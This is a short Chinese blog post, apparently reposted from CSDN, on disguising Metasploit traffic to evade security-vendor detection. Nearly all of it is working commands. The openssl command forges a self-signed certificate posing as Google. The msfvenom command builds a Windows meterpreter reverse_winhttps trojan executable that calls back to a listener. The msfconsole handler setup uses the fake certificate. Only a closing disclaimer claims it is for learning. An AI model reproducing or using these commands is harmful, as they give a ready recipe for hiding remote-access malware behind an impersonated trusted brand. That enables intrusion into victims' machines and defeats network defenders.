其他分享
首页 > 其他分享> > msf流量通讯特征修改

msf流量通讯特征修改

作者:互联网

众所周知msf在安全界的地位,那么它的特征安全厂商肯定是抓的死死的,所以我们需要相应的修改一下。

使用openssl生成证书。

对于openssl这个软件,kali自带。

输入如下命令;

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=US/ST=London/L=London/O=Google Trust Services LLC/CN=www.google.com" \
-keyout www.google.com.key \
-out www.google.com.crt && \
cat www.google.com.key www.google.com.crt > www.google.com.pem && \
rm -f www.google.com.key www.google.com.crt
CN=(名字与姓氏), OU=(组织单位名称), O=(组织名称), L=(城市或区域名称), ST=(州或省份名称), C=(单位的两字母国家代码

参数详解;

-new 指生成证书请求

-nodes 表示私钥不加密,若不带参数将提示输入密码;

-x509表示输出证书;

-days365 为有效期;

-x509 表示直接输出证书;

-subj选项执行自动输入;

 

以上便生成了一个伪谷歌证书了,让msf用上该证书。

首先生成配置该证书的木马文件。

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.1.131 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.google.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f exe -o p.exe

 将该木马上传到虚拟机上抓包

进入msfconsole,进行如下配置:

use exploit/multi/handler

set payload windows/meterpreter/reverse_winhttps

set lhost 0.0.0.0

set lport 443

set HandlerSSLCert www.google.com.pem

set StagerVerifySSLCert true

run

 执行并抓包:

 经过加密的数据包,并且自定义证书。

声明:本文所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途,否则后果自行承担!!!

标签:www,通讯,set,crt,证书,流量,google,msf,com
来源: https://blog.csdn.net/qq_52839196/article/details/122810834